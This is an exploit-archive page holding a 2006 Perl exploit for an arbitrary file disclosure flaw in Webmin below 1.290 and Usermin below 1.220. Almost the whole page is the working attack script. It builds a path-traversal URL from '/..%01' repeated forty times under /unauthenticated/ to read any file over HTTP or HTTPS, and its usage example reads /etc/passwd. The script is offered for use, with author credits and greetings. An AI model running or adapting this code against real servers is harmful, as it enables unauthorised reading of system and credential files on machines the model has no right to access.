Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)
# Published : 2006-07-15
# Author : UmZ
# Previous Title : Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit
# Next Title : BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities

#!/usr/bin/perl
#		Exploit for WEBMIN and USERMIN  less than 1.29x           
#		ARBITARY REMOTE FILE DISCLOSURE
#		WORKS FOR HTTP AND HTTPS (NOW) 		
#		Thrusday 13th  July 2006
#		Vulnerability Disclosure at securitydot.net
#		Coded by UmZ! umz32.dll@gmail.com
#		
#	
#
#		Make sure you have LWP before using this exploit.
#		USE IT AT YOUR OWN RISK
#
#		GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
#		for other.. like AHMED n FAIZ ... (GET A LIFE MAN).



#		Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;
  
if (@ARGV < 4) { 
                    print("Usage: $0 <url> <port> <filename> <target> n"); 
                    print("TARGETS aren ");
		    print("0  - > HTTP n");
		    print(" 1  - > HTTPSn");
		    print("Define full path with file name n");
		    print("Example: ./webmin.pl blah.com 10000 /etc/passwdn");
		    exit(1); 
                    } 

                    ($target, $port,$filename, $tar) = @ARGV;

		print("WEBMIN EXPLOIT !!!!! coded by UmZ!n");
		print("Comments and Suggestions are welcome at umz32.dll [at] gmail.comn");
		print("Vulnerability disclose at securitydot.netnI am just coding it in perl 'cuz I hate PHP!n");
		print("Attacking $target on port $port!n");
		print("FILENAME:  $filenamen");
		

		$temp="/..%01" x 40;
		
		if ($tar == '0')
			{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
			$content=get $url;

			print("n FILE CONTENT STARTED");
			print("n -----------------------------------n");

			print("$content");
			print("n -------------------------------------n");
 			}

		
		elsif ($tar == '1')
			 {
			my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
			my $req = HTTP::Request->new(GET => $url);
			my $res = $userag->request($req);
  			if ($res->is_success) {
   			   	print("FILE CONTENT STARTEDn");
				print("-------------------------------------------n");
				print $res->as_string;
  				print("-------------------------------------------n");
						}
  			else {
      			print "Failed: ", $res->status_line, "n";
  			     }
			}

# www.Syue.com [2006-07-15]